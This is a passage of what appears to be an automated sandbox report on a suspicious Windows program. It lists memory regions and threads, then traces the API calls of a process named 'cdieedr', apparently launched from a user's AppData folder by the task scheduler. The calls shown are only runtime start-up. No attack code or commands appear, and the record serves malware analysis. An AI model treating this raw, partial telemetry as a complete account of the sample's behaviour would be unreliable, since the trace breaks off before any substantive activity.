monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 1332 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskeng.exe.mui" filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui") Region: id = 1334 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1335 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1336 start_va = 0x1b20000 end_va = 0x1bdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b20000" filename = "" Region: id = 1337 start_va = 0x1be0000 end_va = 0x1c5cfff monitored = 0 entry_point = 0x1becec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1338 start_va = 0x1be0000 end_va = 0x1c5cfff monitored = 0 entry_point = 0x1becec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1339 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1340 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1343 start_va = 0x1be0000 end_va = 0x1c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001be0000" filename = "" Region: id = 1344 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1345 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1346 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1347 start_va = 0x380000 end_va = 0x3c4fff monitored = 0 entry_point = 0x381064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1348 start_va = 0x380000 end_va = 0x3c4fff monitored = 0 entry_point = 0x381064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1349 start_va = 0x380000 end_va = 0x3c4fff monitored = 0 entry_point = 0x381064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1350 start_va = 0x380000 end_va = 0x3c4fff monitored = 0 entry_point = 0x381064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1351 start_va = 0x380000 end_va = 0x3c4fff monitored = 0 entry_point = 0x381064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1352 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1353 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1355 start_va = 0x1d20000 end_va = 0x1d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 1356 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1357 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1358 start_va = 0x1da0000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 1359 start_va = 0x1eb0000 end_va = 0x1f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 1360 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1361 start_va = 0x1f30000 end_va = 0x21fefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1362 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1364 start_va = 0x2350000 end_va = 0x23cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 1365 start_va = 0x2480000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 1366 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1367 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1368 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1369 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1370 start_va = 0x7fef8080000 end_va = 0x7fef8088fff monitored = 0 entry_point = 0x7fef80811a0 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 1374 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1375 start_va = 0x2200000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1376 start_va = 0x7fefbc00000 end_va = 0x7fefbc34fff monitored = 0 entry_point = 0x7fefbc01064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 1377 start_va = 0x23d0000 end_va = 0x244ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 1378 start_va = 0x2500000 end_va = 0x25defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002500000" filename = "" Region: id = 1379 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1380 start_va = 0x7fefbc40000 end_va = 0x7fefbc57fff monitored = 0 entry_point = 0x7fefbc41130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Thread: id = 42 os_tid = 0xebc Thread: id = 43 os_tid = 0xec8 Thread: id = 44 os_tid = 0xecc Thread: id = 45 os_tid = 0xed0 Thread: id = 46 os_tid = 0xed4 Thread: id = 47 os_tid = 0xed8 Thread: id = 48 os_tid = 0xedc Process: id = "5" image_name = "cdieedr" filename = "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr" page_root = "0x1b8f4000" os_pid = "0xee0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xeb8" cmd_line = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr " cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1775 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1776 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1777 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1778 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1779 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1780 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1781 start_va = 0x400000 end_va = 0x44dfff monitored = 1 entry_point = 0x402ed7 region_type = mapped_file name = "cdieedr" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr") Region: id = 1782 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1783 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1784 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1785 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1786 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1787 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1788 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1789 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1790 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1925 start_va = 0x2d0000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 1926 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1927 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1928 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1929 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1930 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1931 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1932 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 1933 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1934 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 1935 start_va = 0x450000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1936 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1937 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1938 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1939 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1940 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1941 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2315 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2316 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2317 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2318 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2319 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2320 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2321 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2322 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2323 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2324 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2325 start_va = 0x680000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 2326 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2327 start_va = 0x7d0000 end_va = 0x957fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 2398 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2399 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2400 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2401 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2402 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2403 start_va = 0x960000 end_va = 0xae0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 2404 start_va = 0xaf0000 end_va = 0x1eeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 2405 start_va = 0x1ef0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Thread: id = 85 os_tid = 0xee4 [0165.458] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xd6f18860, dwHighDateTime=0x1d80713)) [0165.458] GetCurrentProcessId () returned 0xee0 [0165.458] GetCurrentThreadId () returned 0xee4 [0165.458] GetTickCount () returned 0xb38124 [0165.458] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=1192910246462) returned 1 [0165.545] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0165.545] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x20e0000 [0165.547] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0165.547] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0165.547] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0165.547] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0165.547] GetProcAddress (hModule=0x769b0000, lpProcName="FlsFree") returned 0x769c354f [0165.547] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0165.548] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0165.548] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0165.548] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0165.548] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0165.548] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0165.548] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0165.548] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0165.549] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0165.549] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0165.549] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0165.549] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0165.549] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0165.549] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0165.550] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0165.550] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0165.550] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x214) returned 0x20e07d0 [0165.550] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0165.550] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0165.550] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x769b0000 [0165.551] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0165.551] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0165.551] GetCurrentThreadId () returned 0xee4 [0165.551] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0165.551] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x8, Size=0x800) returned 0x20e09f0 [0165.551] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0165.551] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0165.551] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0165.551] SetHandleCount (uNumber=0x20) returned 0x20 [0165.552] GetCommandLineA () returned="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr " [0165.552] GetEnvironmentStringsW () returned 0x592250* [0165.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1413, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1413 [0165.552] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x0, Size=0x585) returned 0x20e11f8 [0165.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1413, lpMultiByteStr=0x20e11f8, cbMultiByte=1413, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1413 [0165.552] FreeEnvironmentStringsW (penv=0x592250) returned 1 [0165.552] GetLastError () returned 0x0 [0165.552] SetLastError (dwErrCode=0x0) [0165.552] GetLastError () returned 0x0 [0165.552] SetLastError (dwErrCode=0x0) [0165.552] GetLastError () returned 0x0 [0165.552] SetLastError (dwErrCode=0x0) [0165.552] GetACP () returned 0x4e4 [0165.552] RtlAllocateHeap (HeapHandle=0x20e0000, Flags=0x0, Size=0x220) returned 0x20e1788 [0165.552] GetLastError () returned 0x0 [0165.552] SetLastError (dwErrCode=0x0) [0165.552] IsValidCodePage (CodePage=0x4e4) returned 1 [0165.552] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0165.552] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0165.552] GetLastError () returned 0x0 [0165.553] SetLastError (dwErrCode=0x0) [0165.553] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0165.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0165.553] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0165.553] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0165.553] GetLastError () returned 0x0 [0165.553] 